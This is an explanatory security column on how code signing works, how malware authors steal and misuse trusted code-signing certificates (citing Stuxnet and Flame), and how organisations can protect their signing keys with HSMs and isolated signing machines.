Digital certificates and malware go together like peanut butter and petroleum jelly -- they can be sandwiched together easily, but the result is not exactly tasty or good for you.
As you may know, digital certificates are used to cryptographically sign executable code and documents. If the digital certificate used for signing the content was issued from a certificate authority you or your computer trusts, then the content will more likely be accepted for execution or opening, without warning messages.
The general process of code signing goes something like this:
1. The developer receives a code-signing digital certificate from a trust certification authority (CA).
a. The CA is supposed to identify the developer’s identity before issuing the digital certificate, thereby tying the digital certificate to the verified developer.
b. The code-signing certificate contains the public key of the developer signed by the CA’s private key.
2. The developer creates content.
3. The developer signs content.
b. The hash is then signed by the developer’s private key (related to the public key included in the developer’s code-signing certificate) to create a digital signature.
c. The digital signature is cryptographic proof of the content’s integrity when signed.
4. The developer distributes signed content along with the code-signing digital certificate.
5. When a user or computer downloads the content, a program or a device checks the integrity of the content.
a. The content is rehashed using the hash signature algorithm stated in the digital certificate to get a newly obtained hash result.
b. The original signed content hash is unlocked with the developer’s public key included in the digital certificate.
c. The digital certificate is unlocked by using the public key of the trusted CA (which may already be installed on the device or the downloading program).
d. The original, newly obtained hash results are compared.
e. If the two hashes are identical, it means there is a high likelihood that the content has not been modified since the original signing.
That’s the way it’s supposed to work. The idea is if you come across signed code, particularly if it was signed by a digital certificate from a legitimate CA, you should be able to trust it. Unfortunately, that fragile and often mysterious trust is often broken, so much so that some people wonder if code signing has any value.
Why malware uses digital certificates
This is a no-brainer: Malware is often signed by trusted code-signing certificates to make you or your computing device accept malicious Trojan code as legitimate.
Sometimes the malware writers use their own, nontrusted code-signing certificates, but more often they use code-signing certificates from other legitimate vendors. The number of legitimate vendors who have had their code-signing certificates stolen reads like a who’s who of the computer world. It includes big names who make the world’s most popular software.
Once a legitimate code-signing certificate is stolen, even after the theft has been discovered, it can be difficult to revoke that certificate. That’s because revoking the compromised certificate means all the legitimate software signed by the certificate will no longer be accepted as legitimate, either. One malware program signed by one stolen digital certificate may end up invalidating dozens to hundreds of pieces of legitimate code.
Of course, that’s only when revocation works -- often, it doesn’t.
How malware creators snag trusted digital certificates
Malware creators break into software companies wielding the same techniques they use against any company: social engineering, Trojans, unpatched software, and so on. Sometimes hackers break in with the intent to steal the victim’s code-signing certificates; other times they stumble across them and recognize their value. Malware developers pay handsomely for popular vendors’ code-signing certificates.
For example, the world’s most sophisticated malware program, Stuxnet, was signed by digital certificates stolen from two popular Taiwanese companies. Over the last decade, several cyber gangs dedicated to stealing trusted signing keys have emerged. They are prolific and successful at what they do.
Dozens of malware programs include digital certificate stealing routines in their bag of tricks. A 2013 Symantec report did a great job detailing a number of these tools.
In a few cases, flaws in the digital certificate allowed a determined human adversary to compromise the private key of the code-signing certificate simply because the attacker had the public key (often readily available to any downloader). For example, in 2012, the sophisticated Flame malware program was able to “steal” a Microsoft digital certificate’s private key because it was hashed using the vulnerable MD-5 hash algorithm.
How many malware programs have digital certificates?
I don’t have the latest statistics, but it might not be a stretch to say there are more malware programs with trusted digital signatures than not. McAfee warned that more than 1.5 billion new malicious binaries were signed by malware in one quarter alone -- in 2013. It’s much worse now. Kaspersky has said that digitally signed malware has risen steadily since 2008.
An article by Lucian Constantine of IDG News Service tells the story of multiple digital certificates stolen in 2015. Plus, check out this website dedicated to listing all digital certificates used by malware programs.
How to protect your code-signing certificates
For three decades, whenever I installed a company's new Public Key Infrastructure (PKI), I warned them to protect their PKI servers as if they were the most valuable assets in the firm. For the first two decades I said this because of the theoretical threat, though I knew hackers were not really targeting PKIs or digital certificates -- yet.
Now they are. Over the last decade, hackers and malware have been in hot pursuit of your PKIs and digital certificates, especially your code-signing certificates. Here’s what you can do to protect yourself:
- Be sure to use a hardware storage module for all your PKI CAs and for code signing. To date, no private key has ever been stolen in an unencrypted state from an HSM -- at least no one has publicly acknowledged it.
- All PKI and code-signing servers and computers should have the strongest security settings and configurations available.
- All code signing should be done from dedicated computers not connected to any network.
- Make sure all users understand that a valid, trusted digital certificate doesn’t mean the program they might be tempted to install, execute, or open is harmless. Share this article and educate them.
Malware has so successfully abused the trusted digital signature paradigm that it makes you question the value of the digital signature process in general. Yes, there’s still value, along with issues and cracks. They could be fixed if more code signers used the protections outlined here.